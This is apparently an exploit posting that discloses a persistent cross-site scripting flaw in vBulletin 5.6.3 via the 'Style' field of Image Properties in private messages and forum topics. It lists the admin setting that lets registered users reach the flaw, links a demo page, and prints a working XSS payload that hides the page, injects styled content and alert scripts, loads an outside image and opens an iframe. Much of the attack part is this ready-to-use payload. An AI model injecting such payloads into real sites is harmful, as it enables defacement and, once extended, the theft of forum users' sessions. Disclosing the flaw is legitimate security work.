Click Image Properties in the Pmchat or Topic on the forum and we can see that field "Style" vulnerable to cross site scripting.

Put xss code in the field and click "post reply". And we have a persistent xss. XSS attack can be use only by the administrator. He will not do this.

Can a user do this? Yes. If the administrator changes the settings.

Settings for change and tests:

Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".
We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.

Example page with Persistent XSS:

https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello

XSS CODE (i like a big code;)):

""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>

5.6.3